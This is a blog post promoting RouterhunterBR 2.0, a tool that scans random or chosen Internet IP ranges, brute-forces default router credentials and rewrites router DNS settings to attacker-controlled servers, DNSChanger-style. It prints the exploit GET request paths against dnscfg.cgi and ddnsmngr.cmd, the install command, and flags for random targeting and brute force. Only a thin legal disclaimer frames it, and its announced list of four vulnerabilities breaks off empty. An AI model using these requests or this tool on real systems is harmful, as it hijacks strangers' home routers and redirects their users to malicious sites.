Saturday, 21 September 2024
Exploitation Tools Pentesting Tools Router Exploitation Scanner

Routerhunter 2.0 – A tool used to find vulnerable routers and devices on the Internet and perform tests

The RouterhunterBR is an automated security tool que finds vulnerabilities and performs tests on routers and vulnerable devices on the Internet. TheRouterhunterBR was designed to run over the Internet looking for defined ips tracks or random in order to automatically exploit the vulnerability DNSChangeron home routers.
The DNSChanger is a trojan able to direct user requests to illegal sites. In practice, this malware has the ability to change the DNS settings of our machineredirecting the user to sites with malicious purposes. Imagine for example that your system is infected with this malware, what might happen is that the user toaccess a particular site (eg. Facebook.com) may be forwarded to an unsolicitedwebsite and potentially illegal.

           _           _           _                
  ___ ___ _ _| |_ ___ ___| |_ _ _ ___| |_ ___ ___ 
 |  _| . | | |  _| -_|  _|   | | |   |  _| -_|  _|
 |_| |___|___|_| |___|_| |_|_|___|_|_|_| |___|_|
                       BR - v2.0
 Tool used to find vulnerable routers and devices on the Internet and perform tests.
[ Coded by Jhonathan Davi a.k.a jh00nbr - jhoonbr at protonmail.ch ]
[ fb.com/JhonVipNet - twitter.com/jh00nbr - github.com/jh00nbr/ - blog.inurl.com.br - www.youtube.com/c/Mrsinisterboy ]
[!] legal disclaimer: Usage of RouterHunterBR for attacking targets without prior mutual 
consent is illegal. It is the end user's responsibility to obey all applicable local, state and 
federal laws.Developers assume no liability and are not responsible for any misuse or damage caused
by this program.  

GET’s:

/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1″
/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsIfcsList=&dnsRefresh=1″
/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=”
/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1″
/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP”

Installation:

git clone https://github.com/jh00nbr/Routerhunter-2.0.git

Usage:

-range 192.168.1.0-255, --range 192.168.1.0-255  Set range of IP
  -bruteforce, --bruteforce                        Performs brute force with users and passwords standards, and soon    after defines the malicious DNS.
  -startip 192.168.*.*, --startip 192.168.*.*      Start - IP range customized with wildcard / 201.*.*.*
  -endip 192.168.*.*, --endip 192.168.*.*          End - IP range customized with wildcard / 201.*.*.*
  -dns1 8.8.8.8, --dns1 8.8.8.8                    Define malicious dns1
  -dns2 8.8.4.4, --dns2 8.8.4.4                    Define malicious dns2
  --threads 10                                     Set threads numbers
  -rip, --randomip                                 Randomizing ips routers
  -lmtip 10, --limitip 10                          Define limite random ip

Commads:

–range  201.12.50.0-255
Will set IP range that will be scanned
–bruteforce
Brute force with users and passwords on routers that requires authentication, forcing alteration of dns.
 –startip / –endip
You can customize the IP range with a wildcard / Example: –startip 201.*.*.* –endip 201.*.*.*
–dns1 8.8.8.8 / –dns2 8.8.4.4
Server primary and secondary dns malicious, that anger is listening for requests and will perform the redirection of pages
–threads 10
Set threads numbers
–randomip
Randomizing ips routers
  –limitip 10
Define limite random ip

The script explores four vulnerabilities in routers:

 

Post Comment